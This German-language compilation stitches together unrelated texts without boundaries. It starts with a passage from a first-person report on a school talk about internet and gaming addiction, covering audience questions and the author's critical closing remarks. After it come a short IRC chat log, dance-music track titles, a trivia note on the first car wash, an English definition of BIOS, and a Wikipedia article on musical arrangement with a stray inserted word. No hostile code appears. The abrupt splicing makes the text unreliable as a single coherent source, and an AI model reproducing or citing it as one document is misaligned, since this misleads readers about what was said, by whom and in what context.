Regeln wie man ueber Drogen redet. Ich fuehle mich jetzt wie ein Drogen-
suechtiger. Ich fuehle mich wie eine Person die suechtig ist nach
Drogen - genau! Ich check' das nicht! Ich fuehl' mich abgestempelt
wie einer, der Drogen nimmt. [...]
Also ich bin mit 12 an den Computer 'rangekommen, und ich hab' den
Computer noch nie verlassen. Wenn ich nach Hause komme, mach' ich
den Computer an, und erst abends wieder aus. Ich hab' mich mit 12 mit
Filesharing beschaeftigt - also da ist wirklich alles drin. Also
Pornographie und Mordszenen, man kriegt alles. Also da hat man auch
irgendwie ein Machtgefuehl.
Aber ich fuehle mich bisschen verarscht, weil ich mich mit Leuten
eingestuft fuehle, die Drogensuechtig sind."
Durner: "Ich habe jetzt nicht gesagt, dass _du_ drogensuechtig bist.
Die Sucht ist aber aehnlich wie eine Drogensucht. Es gibt etwas, was
du immer brauchst. Ohne das du nicht leben kannst. Und es gibt ja
verschiedene Handlungssuechte. Wie die Esssucht. Und die Spielsucht.
Und Kaufsucht. Und all das sind Suechte. Und so gibt es auch die
Computersucht und die Internetsucht. Noch dazu: Die Zeit, die man
im Internet verbringt, ist kein Indiz. Das ist ein Faktor von vielen."
Die Person aus dem Publikum erwidert: "Also ich sitze echt viel
vor'm Computer, aber ich hab' trotzdem meine Freunde - ich geh'
am Wochenende weg. Aber trotzdem... ich bin in der evangelischen
Kirche aktiv. Aber trotzdem... ich bin nicht... ich bin nicht suechtig.
Ok, vielleicht bin ich's. [Kurze Pause.] Aber ich lasse mich trotzdem
nicht als fett und asozial bezeichnen. [...]
Ich weiss gar nicht, was ich machen soll. Uns Jugendlichen - wenn ich
kein Musikinstrument spiele, oder nicht sportlich bin, was soll ich machen?
Was wird uns angeboten? Wenn's mal regnet - was koennen wir dann machen?
Uns mit Freunden treffen, ok. Aber es wird echt zu wenig angeboten, also...
ja, ich geb' mal wieder ab."
Durner: "Also mir gehts genau so: Ich finde es auch dumm, wenn jemand
sagt, Computerspiele machen fett und asozial. Ich spiele auch schon
seit Jahren. Aber ich bevorzuge reale Kontakte. [...] Wenn mir jemand
im ICQ schreibt 'Lass uns mal ein Bierchen trinken', dann mache ich
das natuerlich auch. Wenn jemand Sozialkontakte nicht hat, dann wird's
kritisch."
Gerade fuer Zwoelfjaehrige sei es extrem wichtig, "seine realen Erfahrungen
zu machen".
"Trotzdem gibt's eben Bereiche, die kritisch sind, und die muss man auch
beachten."
Auf eine Frage zum Thema Kinderpornographie antwortet Durner, es
sei natuerlich auch ein Problem, wenn Beschraenkungen _nur_ mit
"solchen Tools" moeglich seien: "Wenn der Jugendliche das umgehen
kann, kann er sich alles holen. Das ist ein Problem. Es bedarf
elterlicher Kontrolle. [...] Ich hab deswegen nichts drueber gesagt,
weil ich in meinem Vortrag keine Kinderpornographie haben moechte."
Die naechste befragte Person erkundigt sich nach Richtlinien, wie
viel Computernutzung man seinem Kind erlauben sollte.
Durner antwortet, es haenge "ganz vom Individuum ab".
"Also jemandem, der mehr spielen kann und will... dem sollte man...
Moment, ganz kurz. [Er trinkt ein paar Schlucke Apfelschorle]
Also, mit einer zeitlichen Begrenzung ist es nicht getan. Es
gibt vereinzelt irgend welche Grobrichtlinien. Ich weiss nicht,
ob das jetzt hier drin ist. [Er blaettert in einer der Broschueren.]
Irgendwo hab ich's gelesen, ja. Aber das ist nur so eine Grob-
richtlinie. Nach der man nicht gehen kann. Wenn Sie sagen 'sechs
Stunden pro Woche, hier steht es drin', wird das fuer den Jugend-
lichen kein Argument sein."
Eine weitere Frage: "Wie schaut's aus mit anderen Suechten? Also
wenn man onlinesuechtig ist, kommt man da schnell in's Rauchen und
Trinken rein?"
Durner: "Also was zusammenhaengen kann, ist Nikotinsucht und PC-Sucht.
Es wurde aber wenig untersucht. [...] Jemand, der intensiv in einem
Klan spielt, der muss wach sein. Der muss fit sein. Also kann es sein,
dass er Aufputschmittel nimmt. Aber es gibt keine Untersuchungen."
Frage: "Folgendes: Ich habe frueher mal den Herrn der Ringe in einer
Woche am Stueck durchgelesen. Dann haben mir die Augen gebrannt und
ich war muede. Da hat aber auch keiner gesagt ich haette eine Lese-
sucht. [...] Ist es nicht etwas Jugendtypisches? Isses nicht etwas
Jugendtypisches auch an einer FSK zu ruetteln? Ich kann mich
auch erinnern dass ich mal nachts aufgestanden bin und auch Sachen
angeschaut habe, die ich nicht durfte. Ist es nicht etwas voellig
Normales?"
Durner aeussert, "es gehoeren noch mehrere Faktoren dazu". Meistens
sei es eben der Neuigkeitsgrad eines Spieles, der fesselt. Bei World
of Warcraft sei es so, dass es woechentlich, oder gar noch oefter,
aktualisiert werde. "Es wird permanent aktualisiert. Das heisst das
Spiel ist nie 'zu Ende'. Daher ist das natuerlich ein Faktor, der so
bindet. Das heisst, der Bua kommt gar nimmer davon weg."
Der naechste Fragesteller, moechte wissen, ob es Untersuchungen zum
Altersspektrum von World-of-Warcraft-Spielern gebe. "Das spielen ja
sicher nicht nur Jugendliche."
Durner schuettelt den Kopf. "Ist mir keine Untersuchung bekannt, wie
das Altersspektrum aussieht. Aber mir ist auch bekannt dass die Alters-
struktur nicht rein jugendtypisch ist." [...]
Es gebe Leute, "die sind hocherfolgreich. In dem Spiel. Aber in der
Realitaet nicht. Weil mit 16-17 Stunden am Tag - da kann ich keinen
Job erfuellen."
Jemand im Publikum erwidert, dass es aber eben sehr wohl professionelle
Spieler in China und Japan gebe, die damit Unmengen an Geld verdienen.
Durner scheint diesen Einwand zu ignorieren und meint: "Aber das ist
ein Problem, dass sich die Leute schwer verschulden. Sie haben dann
nichts zu Essen. Das ist eine Krankheit."
Dann wird thematisiert, dass durchaus auch "ganze Familien" gemeinsam
viel Zeit vor dem PC verbringen. Durner: "Bei World of Warcraft hab ich
schon gehoert, dass da die komplette Familie davor sitzt. Also zwei
Eltern, zwei Kinder. Und dementsprechend dann das 'Gerangel' losgeht.
Also ich weiss nicht, ob dann jeder in seinem Zimmer sitzt. Und sie
zusammen Abenteuer bestehen. Aber: Es gibt auch bei erwachsenen Menschen
WoW-Spieler."
Naechste Frage aus dem Publikum: "Gibt es auch 'Passivspielen'? Also
ich kenne eine, die setzt sich zu ihrem Freund, setzt sich daneben
und schaut zu."
Durner: "Hm... Passive Computersucht.. hm..."
[Gelaechter im Publikum]
Eine Person aus dem Publikum ergaenzt, dass auf diese Weise auch Verbote
durch die Eltern umgangen werden koennen: "Wenn ich es ihm verbiete,
geht er halt zum Freund, und spielt dort weiter. Oder guckt zu."
Durner raet, sich in diesem Fall an die Eltern des Freundes zu wenden.
"Andererseits sehen sie ja auch, wie viele Stunden das Kind bei seinem
Freund verbringt. Und ich glaube, wenn man die ganze Zeit nur passiv
zuschaut, dann macht das auf die Dauer keinen Spass."
Eine andere Person aus dem Publikum bringt ein, dass Spiele wie World
of Warcraft, bei denen man einen monatlichen Betrag bezahlen muss um
spielen zu koennen, die Sucht ggf. verstaerken koennen, da man wenn
man dafuer Geld bezahlen muss mehr spielt, um das Gefuehl zu haben,
man bekomme was fuer den ausgegebenen Betrag: "Ich hatte einen Klassen
kameraden, der ist jetzt 21. Der hat monatelang die Schule geschwaenzt,
und 1000 Euro in seinen Rechner reingesteckt, um WoW zu spielen. Er
konnte [dank Flatrate-Tarif] rund um die Uhr ins Internet reinschauen
und WoW spielen."
Durner stimmt zu: "Frueher, als man noch Minutenpreise [fuer den
Internetzugang] gezahlt hat, hat man sich das mehrfach ueberlegt,
ob man noch bissel rumsurft. Aehnlich ist das mit so einem Account
Wenn man dafuer Geld zahlt, muss man ihn natuerlich auch nutzen."
Weiterer Beitrag aus dem Publikum: "Es gibt doch andere Bereiche,
wo man [als Elternteil] selber einen gewissen Hang zur Sucht zeigt.
Nehmen wir als uebertriebenes Beispiel mal einen Kaninchenzuechter-
verein. Wenn einem das Kind vorwirft: 'Du verbringst mehr Zeit im
Kaninchenzuechterverein als bei uns.', dann ist es schwer, dem Kind
Internetsucht vorzuwerfen."
Durner stimmt zu, dass dies ein Problem sein kann.
Der Moderator stellt nochmals die Frage, wie viele Stunden ein Kind denn
nun genau im Internet sein duerfe.
Durner hat daraufhin die Idee, da er schon mal einen Vortrag bzw. Workshop
fuer das Lehrerkollegium veranstaltet hat, demnaechst "einen Workshop fuer
Eltern an der Schule zu veranstalten. Dass wir uns in den Computerraum
reinsetzen, und uns die Spiele anschauen. Um die Begeisterung nachvoll-
ziehen zu koennen."
Daraufhin stelle ich selbst noch einige Fragen, die ich aber leider nicht
mitprotokolliert habe. Fuer viele der von mir angesprochenen Themen gab
es vorab oder waehrend des Vortrages (dank Internet per UMTS) umfassende
Anregungen von guten Bekannten bzw. Freunden aus dem Internet Relay Chat
(von denen ich viele desoefteren auch real treffe und mich hervorragend
mit ihnen verstehe), die ich aufgreife. Z.B. spreche ich an, dass
intensive Computernutzung nicht automatisch dazu fuehrt, dass die realen
Sozialkontakte sich verringern, sondern dass das Internet ungemeine
Chancen bietet, neue Kontakte herzustellen, und zwar nicht wie bei
Kontakten die im realen Leben beginnen, sehr stark oertlich beschraenkt,
sondern sogar internationale Kontakte sehr einfach moeglich sind. Vor
allem fuer soziale Randgruppen (jemand anders aus dem Publikum nennt
hierzu z.B. homosexuelle Personen als Beispiel, ich nenne zudem noch
Leute, die in der Schule oder im sonstigen Umfeld 'gemobbt' werden)
sei es meiner Ansicht nach sehr viel leichter oder gar anfangs ueber-
haupt nur moeglich, Kontakte 'virtuell' zu beginnen, denn auf diese
Weise kann man zwangslaeufig zunaechst nicht nach 'aeusseren Faktoren'
wie Aussehen oder Verhalten beurteilt werden, sondern rein nach dem,
was man selber auf gedanklicher Ebene preisgibt. Daher besteht Potenzial,
Kontakte zu finden, die ohne diese 'Virtualitaet' nie moeglich gewesen
waeren, die dann aber eben sehr oft auch real weitergefuehrt werden.
Durner stimmt zu, dass das Internet hier viele Moeglichkeiten bietet,
meint aber auch, dass viele virtuelle Kontakte nicht zu realen werden,
und dass es auch ein Problem darstellt, dass jeder eben nur genau das
vom Gegenueber erfaehrt, was dieser selber erzaehlt. "Wenn man z.B.
bei fs-location.de schaut, was die Leute so von sich schreiben, da steht
so viel Muell drin..."
Ich erwidere, dass man natuerlich einen guten 'Filter' braucht, um bei
jeglicher Information im Internet einschaetzen zu koennen, was
davon wahrscheinlich 'real' ist, und was wirklich 'Muell' und z.B.
eine offensichtliche Luege ist; und hier helfen meiner Ansicht nach
absolut keine automatisierten technischen Loesungen, sondern das eigene
Gehirn muss die 'Filter'-Funktion uebernehmen. Und dazu ist es meiner
Ansicht nach unerlaesslich, sich intensiv mit dem Medium Internet zu
befassen, da man solche Urteilsfaehigkeit nur durch staendige und zeitlich
ausgedehnte Auseinandersetzung damit erlernt bzw. ausbaut.
Etwa um 21:45 endet die Diskussionsrunde. Durner wird gefragt, ob er
"vielleicht noch ein Abschlusswort" haette, das er dem Publikum mit-
geben moechte. Er ueberlegt kurz und meint: "Gar nicht. Also so was
richtig Bedeutungsschwangeres: Gar nicht. Also vielen Dank."
Nach einem kurzen Applaus beginnen die Zuschauer, die Schule zu verlassen.
Ich unterhalte mich draussen noch mit einem vermeintlich 'virtuellen'
Bekannten, den ich waehrend des Vortrags zum ersten Mal in Person sah,
mit dem ich aber vorher schon intensive Gespraeche im Internet Relay
Chat fuehrte, und wir uns dementsprechend auch IRL auf Anhieb gut
verstanden.
Meine Kevlar-Weste hat uebrigens wohl keinen all zu sehr gestoert
oder beunruhigt, auch wenn ein Freund und meine Mutter vorab energisch
versuchten mir diese Kleidungswahl auszureden, da "ich dann nicht
serioes wirke" bzw. "die Leute Angst vor mir" haetten. Ich bin jedenfalls
selbst absoluter Pazifist und verabscheue Gewalt, und trug die Weste
rein aus symbolischem Selbstschutz vor ach-so-gefaehrlichen Schuelern:
Als satirische Referenz auf die gaengige Polemik "Computerspiele
machen Jugendliche zu Amoklaeufern".
Mein eigenes Schlusswort zum Vortrag - im Gegensatz zu Herrn Durner bin
ich willig, mir eines aus den Fingern zu saugen:
Da es in unserer kaputten Gesellschaft absolut normal und sogar anerkannt
und gewuerdigt ist, Probleme zu verdraengen statt den Ursachen auf den
Grund zu gehen, neigen viele Leute dazu, den schwarzen Peter fuer soziale
Probleme einfach leblosen Kisten zuzuschieben. Es ist total out, ueberhaupt
nach den tiefgruendigen Wurzeln der Probleme zu suchen, geschweige denn
weitreichende positive Veraenderungen unserer Gesellschaftsstruktur zu
erwirken. Vor allem beim Bildungssystem in unserem Jammerland laeuft
sehr viel schief. Aber es ist halt viel einfacher und kurzfristig
'gewinnbringender', vor allem fuer Demagogen, viel zu naheliegende
engstirnige polemische Schuldzuweisungen zu betreiben.
'Deus ex machina' war frueher mal. 'Der Teufel im Kasten' ist 'in'.
[12:20:12] <s0lfunk> mh
[15:33:33] <s0lfunk> Jetzt bin Ich zum Großteil auf fester Milch.
[15:33:37] <s0lfunk> Kaffeeweißer ;-)
[15:33:51] <s0lfunk> Bist du Tot?
[15:34:07] <s0lfunk> *MÄMÄ*
[15:34:22] <s0lfunk> Gib mir ein S
[15:34:24] <s0lfunk> Gib mir ein O
[15:34:26] <s0lfunk> Gib mir ein P
[15:34:28] <s0lfunk> Gib mir ein H
[15:34:30] <s0lfunk> Gib mir ein I
[15:34:32] <s0lfunk> Gib mir ein E
Alles Party oder was => Ganz nach dem Motto: Sehen & Gesehen werden.
Tomorrowland Belgium 2018
AlexTC - Angel in the sky [Pop Version]
AleXTC - Angel in the sky [Radio Edit]
Scooter x Harris & Ford - God save the Rave
Damals: 1962 - Die erste Waschanlage. Die Augsburger Unternehmer Gebhard Weigele und Johann Suzberger meldeten 1962 die weltweit erste "selbsttätige Waschanlage für Kraftfahrzeuge" zum Patent an. 1964 folgte die erste vollautomatische Waschstraße.10.09.2012
BIOS Basic Input Output System
BIOS (basic input/output system)
Posted by: Margaret Rouse
WhatIs.com
BIOS (basic input/output system) is the program a personal computer's microprocessor uses to get the computer system started after you turn it on. It also manages data flow between the computer's operating system and attached devices such as the hard disk, video adapter, keyboard, mouse and printer.
BIOS is an integral part of your computer and comes with it when you bring it home. (In contrast, the operating system can either be pre-installed by the manufacturer or vendor or installed by the user.) BIOS is a program that is made accessible to the microprocessor on an erasable programmable read-only memory (EPROM) chip. When you turn on your computer, the microprocessor passes control to the BIOS program, which is always located at the same place on EPROM.
When BIOS boots up (starts up) your computer, it first determines whether all of the attachments are in place and operational and then it loads the operating system (or key parts of it) into your computer's random access memory (RAM) from your hard disk or diskette drive.
With BIOS, your operating system and its applications are freed from having to understand exact details (such as hardware addresses) about the attached input/output devices. When device details change, only the BIOS program needs to be changed. Sometimes this change can be made during your system setup. In any case, neither your operating system or any applications you use need to be changed.
Although BIOS is theoretically always the intermediary between the microprocessor and I/O device control information and data flow, in some cases, BIOS can arrange for data to flow directly to memory from devices (such as video cards) that require faster data flow to be effective.
This was last updated in August 2014
Flashskes Musik allerlei Weiterfuehrung...
DJSpaceCourt - The Universe
https://de.wikipedia.org/wiki/Arrangement
Arrangement
Zur Navigation springen
Zur Suche springen
Der Titel dieses Artikels ist mehrdeutig. Weitere Bedeutungen sind unter Arrangement (Begriffsklärung) aufgeführt.
Durch ein Arrangement wird in der Musik ein oftmals urheberrechtlich geschütztes Musikwerk mit Hilfe musikalischer oder technischer Gestaltungsmittel in seiner ursprünglichen Ausdrucksform verändert. Arrangeur ist die Person, die derartige Arrangements durchführt. Daneben existiert auch die Bezeichnung Orchestrator, dessen Tätigkeitsfeld meist auf größer besetzte orchestrale Werke abzielt.
Inhaltsverzeichnis
1 Allgemeines
2 Gestaltungsmittel
2.1 Musikalisch
2.2 Technisch
3 Geschichte
4 Arrangement im Jazz
5 Arrangement in Pop- und Rockmusik
6 Funktion
7 Abgrenzungen
8 Rechtsfragen
9 Literatur
10 Weblinks
11 Einzelnachweise
Allgemeines
In der klassischen Musik verlangt heutzutage die sog. Werktreue eine originalgetreue Wiedergabe der Partituren, selbst für geringfügige Neugestaltungen ist dadurch kein Raum. Die Werktreue verleiht den Werken einen sicheren Wiedererkennungswert, ohne Rücksicht darauf, welches Sinfonieorchester oder Ensemble sie spielt. Aber selbst bei strengen Partituren bedarf die Realisierung des Werkes doch der Interpretation durch Musiker und Sänger und damit der ästhetischen Auslegung der Noten, auch wenn die Grenzen eng gesetzt sind.[1] Arrangements sind somit eine besondere Form der Interpretation und die Abweichung von der Partitur des Originals durch musikalische Gestaltungsmittel.[2] Arrangements als Form der Werkinterpretation gibt es daher heutzutage meist nur bei anderen Musikstilen, insbesondere in Jazz-, Popmusik und Rockmusik. Die Arrangements des 19. Jahrhunderts oder Schönbergs Verein für musikalische Privataufführungen sind allerdings Beispiele für weitverbreitete historische Praxis von Arrangements klassischer Musik.
Als Arrangement wird nur die Neugestaltung eines Originals verstanden. Nicht unerwähnt bleiben soll, dass – auch in der klassischen Musik – Komponisten oft auf Arrangeure zurückgegriffen hatten, weil sie nicht selbst arrangieren wollten oder konnten. Das Arrangement ist eine für den Bereich der populären Musik typische kreative Erscheinung.[3] Die Skala des Arrangements reicht hier vom gelegentlichen Eingriff bis hin zu einer vollständigen Neugestaltung des Originals.[4]
Die Art der (Neu-)Einrichtung eines Musikstücks bzw. die Bearbeitung[5] kann dabei sehr unterschiedlich sein:
Der Inhalt des Originals bleibt erhalten wie etwa bei der Umschreibung (Transkription) einer Komposition für eine andere Besetzung.
Teile des Originals oder verschiedene Originalkompositionen werden zu einer neuen Reihenfolge zusammengestellt und gegebenenfalls mit zusätzlich komponierten Überleitungen verbunden wie bei Suiten, Potpourris oder Medleys von beliebten Melodien eines bestimmten Themenkreises.
Gestaltungsmittel
Der Stellenwert des Arrangements kann anhand der Bestandteile einer Komposition abgelesen werden. Eine Komposition besteht aus Primärkomponenten (Melodik, Rhythmik, Harmonik und Form) und Sekundärkomponenten (Arrangement, Interpretation und Aufnahmetechnik). Für Arrangements stehen dem Arrangeur musikalische und/oder technische Gestaltungsmittel zur Verfügung. Von ihnen kann er eines oder mehrere beim Arrangement betonen, andere wiederum ignorieren. Die Gestaltungsmittel bestehen insbesondere aus anderen Instrumentierungen, Reharmonisierungen oder Modulationen.[2]
Musikalisch
Für ein anderes Arrangement stehen dieselben Gestaltungsmittel zur Verfügung, die auch der Komponist bei der Gestaltung seines Originalwerkes anwenden kann. Zu den musikalischen Gestaltungsmitteln gehören Besetzung, Melodik, Harmonik, Rhythmik, Metrik, Tempo, Phrasierung, Artikulierung, Ornamentik, Kadenz oder Periodik.
Technisch
Technische Gestaltungsmittel kommen im Tonstudio bei der Tonaufnahme selbst oder bei deren Postproduktion zum Einsatz, sie sind Teil der Tongestaltung. Bei der Tonaufnahme selbst können Echo- oder Nachhalleffekte eingesetzt werden, bei der Postproduktion Soundeffekte. Selbst die Abmischung als vorletzter Prozess im Tonstudio kann noch gestalterische Aspekte eines Arrangements enthalten.
Geschichte
Die größte Bedeutung kam dem Arrangement in der nicht-orchestralen Musik seit dem 20. Jahrhundert zu. In der späten Renaissance- und der Barockmusik lag schon eine Kürzelschreibweise, wie heute bei den Leadsheets, vor – der Generalbass oder basso continuo. So musste z. B. der Cembalist bei Vivaldi diese Kürzel improvisierend spontan ausspielen, und sie wurden erst später explizit in Noten fixiert, wobei natürlich der Improvisationscharakter verlorenging. Während in der „Klassischen Musik“ die Kunstmusik Note für Note auskomponiert und vom Komponisten instrumentiert wurde – abgesehen z. B. von den Überleitungsteilen der Kadenzen –, geben andere Musikstile der freieren Ausführung oder der Improvisation mehr Raum. Johann Strauss (Sohn) schrieb zwar die Partituren seiner eigenen Kompositionen selbst, er bearbeitete jedoch auch Opern- und Konzertmusik anderer Autoren für seine eigenen Orchester. Insgesamt gibt es von ihm mehr als 500 Arrangements fremder Kompositionen.[6]
Viele im 20. Jahrhundert entstandene Musikstücke – etwa im Blues, Jazz oder Pop, in der Volksmusik und allen davon abgeleiteten Gattungen – geben den ausführenden Musikern oder Sängern größere Freiheit in der Interpretation eines Stückes. Sie erstreckt sich nicht nur auf den Ausdruck, sondern schließt auch notations-technisch relevante Aspekte ein. Stücke aus diesen Bereichen sind oft nur in Melodielinie und Harmoniefolge vorgegeben. Aufgabe des Arrangeurs ist es, aus diesen wenigen Vorgaben ein Arrangement zu machen, das den Musikern genauere Angaben oder Ausführungsmöglichkeiten gibt. Dies kann durch die Erstellung einer Partitur geschehen, durch mündliche Absprachen mit den Musikern oder auch durch Audiobeispiele.
Größere Bedeutung erlangten Arrangements erst im Jazz. Hier wird das geschriebene Arrangement bereits bei den weißen „sinfonischen“ Jazzorchestern wie Paul Whiteman, Leo Reisman oder Jean Goldkette verwendet. Berühmte Arrangeure jener Zeit waren Don Redman (für Fletcher Henderson), Doc Cook (Chicago Jazz) oder Erskine Tate. Die Standardformeln der Big Band-Arrangements wurden von Art Hickman, Bill Challis oder Ferde Grofé gesetzt.[7] Insbesondere Grofé entwickelte für Paul Whiteman die Prinzipien, die in der Swing-Ära ihren Höhepunkt fanden:
Aufteilung des Orchesters in „Sections“: Bläser, Streicher, Saxophone und Rhythmus;
diese Sektionen spielen Call and Response oder kontrapunktisch;
meist improvisierte Soli;
Ensemblepassagen werden mit dem Feeling improvisierter Soli gespielt.
Im Laufe der Musikgeschichte wurden Arrangements nicht nur von anderen Arrangeuren, sondern auch von den Komponisten der Originalwerke selbst vorgenommen. Im 19. Jahrhundert wuchs der Bedarf an leicht auszuführenden Bearbeitungen bekannter Werke etwa für Tanzorchester. Seit dieser Zeit erhielt der Begriff des Arrangements den Beigeschmack des „aus zweiter Hand stammenden Werks“. Denn Meisterwerke der Musik wurden häufig an unzulängliche Besetzungen insbesondere in der Salon- oder Kaffeehausmusik und an die Vorlieben weniger anspruchsvoller Hörerschichten angepasst, die nur die populären „schönen Melodien“ – herausgelöst aus qualitativem musikalischen Zusammenhang – hören wollten.
Arrangement im Jazz
Charakteristisch für den Jazz ist, dass wegen vorherrschender Improvisation meist keine Notation vorliegt und damit auch keine Partituren für einzelne Instrumente vorhanden sind, wodurch das Arrangement besondere Bedeutung erhält. Unter Jazzarrangement versteht man die Einrichtung eines Musikstücks für eine andere als die originale Besetzung. Im Jazz erlangte das ausgeschriebene Arrangement besonders zu Zeiten der Big Band große Bedeutung; deren Bandleader kultivierten die Jazzarrangements für größere Bands, indem sie auf den Leistungen eines Jelly Roll Morton als Arrangeur aufbauten.[8] Im Gegensatz dazu steht das „Head Arrangement“ als zwischen den Musikern lediglich mündlich abgesprochenem, spontanem Musikverlauf. Das Standard-Arrangement sieht im Jazz vor, dass nach dem Intro ein Head Arrangement folgt, das zu den Soli überleitet, die wiederum durch ein Head Arrangement abgelöst werden, um danach zum Outro zu gelangen.[9] Im Jazz wird das Ausgangsmaterial (das „Original“) lediglich als musikalischer Kern verstanden; das jeweilige Arrangement ist die eigentliche musikalische Schöpfung. Deshalb wird im Jazz der Arrangeur oft als der eigentliche Komponist angesehen. Viele Jazztitel sind erst in der Form eines bestimmten Arrangements populär geworden, so etwa In the Mood in der Fassung von Glenn Miller (aufgenommen am 1. August 1939). Arrangements galten und gelten im Jazz als einzigartige Identität für die Jazzband.[10] Im Jazz dient das Arrangement als Alternative zur Improvisation und nicht als Ersatz der Improvisation wie in der Pop- und Rockmusik.
Arrangement in Pop- und Rockmusik
Das Arrangement ist in der Pop- und Rockmusik spätestens seit Yesterday von den Beatles (17. Juni 1965) nicht mehr an die übliche Instrumentation einer Beatband gebunden. Es kann sich jedoch auch eng an das Original anlehnen so wie Rock Around the Clock von Bill Haley (12. April 1954) im Vergleich zum Original von Sonny Dae and his Knights (20. März 1954). Vorsichtige Neugestaltungen wie Ray Charles‘ Coverversion von Eleanor Rigby (März 1968; Original von den Beatles; 6. Juni 1966) stehen umfassenden Neuarrangements wie dem Supremes-Hit You Keep Me Hangin’ On (1. August 1966) von Vanilla Fudge (Mai 1967) gegenüber. Der letztgenannte Musiktitel ist ein Beispiel dafür, wie stark ein Arrangement zur Veränderung des Originals beitragen kann. Im Ultrasonic-Studio entstand mit Vanilla Fudge in nur einem Take eine epische Version des Supremes-Hits. Während sich Coverversionen häufig stark an das Original anlehnen, war in diesem Fall jedoch das Original kaum noch wiederzuerkennen. Das in Mono aufgenommene Stück wurde auf 6:47 min ausgedehnt und auf Zeitlupentempo verlangsamt, denn das ursprüngliche Tempo wurde auf die Hälfte reduziert. Der psychedelische Sound mit einer neoklassischen Orgelpartitur und Sitar-Passagen verfremdet das Original bis zur Unkenntlichkeit. Die auf 2:50 min verkürzte Single-Fassung erschien am 2. Juni 1967 und erregte weltweites Aufsehen.
Berühmte Arrangeure der Popmusik waren Leiber/Stoller, Jack Nitzsche, Phil Spector, George Martin oder Todd Rundgren. Das Beispiel des Musikproduzenten George Martin zeigt, dass die Aufgaben zwischen Musikproduzent und Arrangeur in der kommerziellen Musik oft fließend sind.
Funktion
Das Arrangement soll dem Zuhörer eine weitere Variante der Interpretation des Originals nahebringen. Es kann andere Hörerkreise erschließen, wenn es im Vergleich zum Original einen anderen Musikstil präsentiert wie etwa Puttin’ on the Ritz von Taco (September 1982) gegenüber Leo Reismans Original (20. Januar 1930). Aus kommerziellen Gründen wird ein im Original durchgefallener Song mit Hilfe eines attraktiveren Arrangements hitparadenfähig umgestaltet so wie bei Chubby Checkers Version von The Twist, dessen Original von Hank Ballard (11. November 1958) stammte. Checkers Version wies derart frappierende Ähnlichkeiten mit dem Original auf, dass Hank Ballard beim Radiohören dachte, es sei sein Stück.[11] Checkers Version war identisch in Tonhöhe, Rhythmus und Gesang. Während das Original – zumal B-Seite – unterging, entwickelte sich Checkers Coverversion zum Millionenseller.
Das Arrangement verleiht dem Musikstück seinen prägenden Charakter, der zum Wiedererkennungswert beitragen kann. Durch ein Arrangement kann die vom Komponisten vorgegebene Struktur einer Komposition simpler oder komplexer ausgestaltet werden. Das Arrangement ist das zentrale Stilmittel der Pop- und Rockmusik. „Der Arrangeur ist das wichtigste Bindeglied zwischen einem Komponisten und dessen Komposition und den Musikern bzw. den Orchestern, die diese Musikstücke aufführen oder aufnehmen. Seine Aufgabe besteht also darin, eine bereits existierende Komposition für jede Art von Besetzung und in jeder Stilistik bearbeiten zu können.“[12]
Heute wird insbesondere bei elektronischer und Popmusik unter dem Arrangement mitunter auch ein Teil der Bearbeitung gezählt, welcher streng genommen eher als Teil der Komposition gesehen wird bzw. einem Remix nahekommt. Als Arrangeur ist oft jemand angegeben, der bei einer bereits fertigen Aufnahme noch einmal am Aufbau des Musikstückes gearbeitet hat. Die verschiedenen Tätigkeiten sind mitunter nicht ganz klar voneinander abzugrenzen.
AbgrenzungenScene.org
Mit dem Arrangement ist also nicht die Instrumentation an sich gemeint, sondern vielmehr die individuelle, künstlerische Art und Prägung der Aufführung durch die jeweiligen Interpreten. Transkription ist lediglich die Umschreibung von einer Notenschrift in eine andere oder die Übertragung von akustisch wahrgenommener Musik in eine Notenschrift, so dass hier die für ein Arrangement wichtigen gestalterischen Aspekte fehlen. Head Arrangements sind die zwischen Musikern vor der Aufführung abgesprochenen Gestaltungen eines Musikstückes, ohne dass diese in Noten festgehalten werden.[13] Dabei wird die Reihenfolge der Soli oder das Wechselspiel zwischen Rhythmus- und Melodiegruppe festgelegt. Es handelt sich um spontane, meist im Jazz zu findende Gestaltungen, die auch für den Memphis-Soul charakteristisch waren. Zwar sind in der Musik die Wiederholungen von einzelnen Phrasen nichts Besonderes und finden im Refrain einen zentralen Baustein, doch gibt es Musikstile, die eine intensive Wiederholung einzelner Fragmente präsentieren. Dieses repetitive Arrangement ist typisch im Country Blues, Mambo, Salsa und Techno. Im Jazz spricht man von Live-Arrangement, wenn die Verteilung der Aufgaben unter den Mitspielenden erst kurz vor oder sogar erst während der Aufführung mündlich oder auf Zeichen erfolgt. Dazu müssen das Hauptthema und die Harmoniefolge allen Musikern bekannt sein. Die Tutti-Abschnitte sowie zusätzliche gewünschte Effekte muss der Bandleader vorab erläutern oder einstudieren, sie liegen (seit den 1920er Jahren) deshalb als Partitur vor. Die Solo-Teile können dann von einzelnen Musikern improvisierend gestaltet werden, wobei in besseren Arrangements auch diesen Teilen jeweils vollständige Partituren zugrunde liegen, die im Verlauf eine thematisch rhythmische Entwicklung aufweisen und die Veränderung von Solist zu Solist in die Gesamtentwicklung des Stücks musikalisch einbauen.
Rechtsfragen
Das neue Arrangement eines Musikwerkes ist stets abhängige Bearbeitung nach § 3 UrhG oder – bei fehlender Schöpfungshöhe des Arrangements – eine abhängige andere Umgestaltung im Sinne von § 23 UrhG.[14] In beiden Fällen ist die Einwilligung des Originalkomponisten erforderlich. Das individuelle Arrangement eines Musikwerkes ist schutzfähig, wenn der Arrangeur durch den Einsatz von Stilmitteln etwas Eigenschöpferisches schafft.[15] Dem klassischen Arrangement spricht die Rechtsprechung eine schöpferische Eigenart nur zu, sofern das Arrangement über das rein handwerkliche Anwenden musikalischer Lehren hinausgeht.[16] Da ein Arrangement begrifflich an einem bereits bestehenden und geschützten Werk vorgenommen wird, ist der Arrangeur als ein Bearbeiter im Sinne von § 3 UrhG anzusehen.[17] Bei gemeinfreien Musikwerken im Bereich der U-Musik wird nicht mehr ihr ursprünglicher Komponist angegeben, sondern ihr Arrangeur. Rechtsansprüche der Arrangements werden durch die Gema vertreten.
Literatur
Markus Fritsch, Peter Kellert: Arrangieren und Produzieren. Leu Verlag, ISBN 3-928825-22-4.
Ulrich Kaiser, Carsten Gerlitz: Arrangieren und Instrumentieren, Barock bis Pop. Kassel 2005, ISBN 3-7618-1662-6.
George T. Simon: Die Goldene Ära der Bigbands. hannibal Verlag, ISBN 3-85445-243-8.
David Baker: Arranging & Composing, For the Small Ensemble: Jazz, R&B, Jazz-Rock. alfred, komplette Anleitung von der Melodie über Harmonisierung bis hin zur sechsstimmigen Partitur.
